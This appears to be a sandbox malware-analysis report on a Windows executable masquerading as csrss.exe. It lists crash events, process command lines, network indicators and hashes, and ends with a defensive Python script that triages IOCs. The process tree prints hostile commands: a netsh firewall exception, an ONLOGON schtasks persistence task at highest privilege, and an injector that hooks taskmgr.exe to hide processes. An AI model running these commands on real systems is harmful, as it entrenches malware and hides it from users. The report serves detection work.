N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\rss\csrss.exe

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A

GoLang User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4032 -ip 4032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 904

C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe

"C:\Users\Admin\AppData\Local\Temp\6f1f130741c10e884ac91387ba6f1671.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3232 -ip 3232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1492

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3232 -ip 3232

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3232 -ip 3232

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /124-124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 840

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5084 -ip 5084

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5084 -ip 5084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 1568

Network

Country  Destination          Domain                                                Proto
US       8.8.8.8:53           133.211.185.52.in-addr.arpa                           udp
US       8.8.8.8:53           0.205.248.87.in-addr.arpa                             udp
US       8.8.8.8:53           71.159.190.20.in-addr.arpa                            udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa                           udp
US       8.8.8.8:53           -                                                     udp
US       8.8.8.8:53           183.142.211.20.in-addr.arpa                           udp
NL       185.107.56.197:443   -                                                     tcp
US       8.8.8.8:53           apps.identrust.com                                    udp
GB       96.17.179.184:80     apps.identrust.com                                    tcp
US       8.8.8.8:53           survey-smiles.com                                     udp
US       199.59.243.225:80    survey-smiles.com                                     tcp
US       8.8.8.8:53           184.179.17.96.in-addr.arpa                            udp
US       8.8.8.8:53           197.56.107.185.in-addr.arpa                           udp
US       8.8.8.8:53           225.243.59.199.in-addr.arpa                           udp
US       8.8.8.8:53           ninhaine.com                                          udp
US       8.8.8.8:53           2makestorage.com                                      udp
US       8.8.8.8:53           nisdably.com                                          udp
US       8.8.8.8:53           22f921b0-82cb-4918-9889-6d0f36588c5d.ninhaine.com     udp
US       8.8.8.8:53           server3.ninhaine.com                                  udp
CZ       46.8.8.100:443       server3.ninhaine.com                                  tcp
CZ       46.8.8.100:443       server3.ninhaine.com                                  tcp
CZ       46.8.8.100:443       server3.ninhaine.com                                  tcp
US       8.8.8.8:53           ww82.ninhaine.com                                     udp
US       199.59.243.225:80    ww82.ninhaine.com                                     tcp
US       199.59.243.225:80    ww82.ninhaine.com                                     tcp
US       199.59.243.225:80    ww82.ninhaine.com                                     tcp
US       8.8.8.8:53           100.8.8.46.in-addr.arpa                               udp
US       8.8.8.8:53           171.39.242.20.in-addr.arpa                            udp
US       8.8.8.8:53           50.23.12.20.in-addr.arpa                              udp
US       8.8.8.8:53           18.134.221.88.in-addr.arpa                            udp
US       8.8.8.8:53           30.243.111.52.in-addr.arpa                            udp
CZ       46.8.8.100:443       server3.ninhaine.com                                  tcp
US       199.59.243.225:80    ww82.ninhaine.com                                     tcp
US       8.8.8.8:53           104.246.116.51.in-addr.arpa                           udp

(A "-" in the Domain column marks a row the report lists without a domain.)
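
The network table mixes three kinds of rows: forward DNS queries to the sandbox resolver (8.8.8.8), reverse in-addr.arpa lookups the sandbox issues for addresses it sees, and the TCP connections themselves, some of them to a bare IP with no preceding lookup (185.107.56.197:443). The Python below is an added example, not part of the report: it parses a constructed subset of those rows, reverses the PTR names back into IP addresses, pairs resolved names with the endpoints actually contacted, counts repeat connections, and produces a candidate indicator list. The allowlist (apps.identrust.com as a certificate-validation host) is an analyst's assumption for the example, and the page itself does not label any of these hosts as C2; the output is a starting point for triage, not a verdict.

```python
from collections import Counter, defaultdict

# Constructed sample: a subset of the Network table above, copied as listed
# (two rows carry no domain, exactly as the report shows them).
SAMPLE_NETWORK = """\
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
NL 185.107.56.197:443 tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 server3.ninhaine.com udp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
CZ 46.8.8.100:443 server3.ninhaine.com tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
"""

# Assumed, analyst-maintained allowlist: hosts the sample contacts for
# reasons unrelated to command and control (here, certificate validation).
ALLOWLIST = {"apps.identrust.com"}

PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(text):
    """Parse 'Country Destination [Domain] Proto' rows; '-' or a missing
    column both mean 'no domain'."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        if domain == "-":
            domain = ""
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def ptr_to_ip(name):
    """'100.8.8.46.in-addr.arpa' -> '46.8.8.100' (PTR labels are reversed)."""
    if not name.endswith(PTR_SUFFIX):
        return None
    octets = name[:-len(PTR_SUFFIX)].split(".")
    if len(octets) != 4 or not all(o.isdigit() for o in octets):
        return None
    return ".".join(reversed(octets))


def summarize(rows, allowlist=ALLOWLIST):
    reverse_lookups, queried = set(), set()
    resolved = defaultdict(set)      # domain -> endpoints contacted under it
    counts = Counter()               # endpoint -> number of connections
    direct = []                      # endpoints contacted with no domain at all
    for r in rows:
        endpoint = f"{r['ip']}:{r['port']}"
        if r["proto"] == "udp" and r["port"] == 53:
            ip = ptr_to_ip(r["domain"])
            if ip:
                reverse_lookups.add(ip)
            elif r["domain"]:
                queried.add(r["domain"])
            continue
        counts[endpoint] += 1
        if r["domain"]:
            resolved[r["domain"]].add(endpoint)
        elif endpoint not in direct:
            direct.append(endpoint)
    contacted = {r["ip"] for r in rows
                 if not (r["proto"] == "udp" and r["port"] == 53)}
    iocs = {d for d in queried if d not in allowlist}
    iocs |= {e for d, eps in resolved.items() if d not in allowlist for e in eps}
    iocs |= set(direct)
    return {
        "queried": sorted(queried),
        "resolved": dict(resolved),
        "connection_counts": dict(counts),
        "direct_connections": direct,
        # IPs the sandbox reverse-resolved that it also connected to
        "ptr_of_contacted": reverse_lookups & contacted,
        "candidate_iocs": sorted(iocs),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(SAMPLE_NETWORK)).items():
        print(f"{key:20} {value}")
```

Connections to an address that was never looked up by name (the direct_connections list) deserve a closer look than resolved ones, since a hard-coded IP survives domain takedowns; the repeat count on 46.8.8.100:443 is the kind of signal that, over a longer capture, separates periodic check-ins from one-off downloads.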

Files

memory/4032-1-0x0000000005040000-0x000000000547E000-memory.dmp

memory/4032-2-0x0000000005480000-0x0000000005DA6000-memory.dmp

memory/4032-3-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/4032-5-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/4032-6-0x0000000005480000-0x0000000005DA6000-memory.dmp

memory/3232-7-0x0000000004F60000-0x00000000053A1000-memory.dmp

memory/3232-8-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 5d40fb25ca390d778ae098c7c2b52851
SHA1 fb16e69f7cce3ca0053a90bbbc107dedebea3352
SHA256 7a5cde889fc76d6cd230a74ed658fb446928b69fdeb458be70be7c28f30f81ad
SHA512 0be767a72d8ee0d4de32209283c6389376a806977e1f1f546eb5ed76720b69c87bb1ed12d667eca53524234de14d529b2cda8e0ddca84d002de162c8fda9ab04

C:\Windows\rss\csrss.exe

MD5 83d7c3ddfb73f9444fc1411864043fa1
SHA1 6ea0a15bb8ac0a86182d06c91024e0c8d54a1eb2
SHA256 4901f67bb729ec47e58a19b5cb0683bcd7c8d073a951eeafd18f37cfb90e8c57
SHA512 1fb0307a468ef35d2c37a0557408006cd4945c41f4fe95a1ffecb5ce8e629adf4f85767868d8a12d6da475219142ed932e7157da797a8b079db4923d6fb2d4ee

memory/3232-16-0x0000000000400000-0x00000000030F3000-memory.dmp

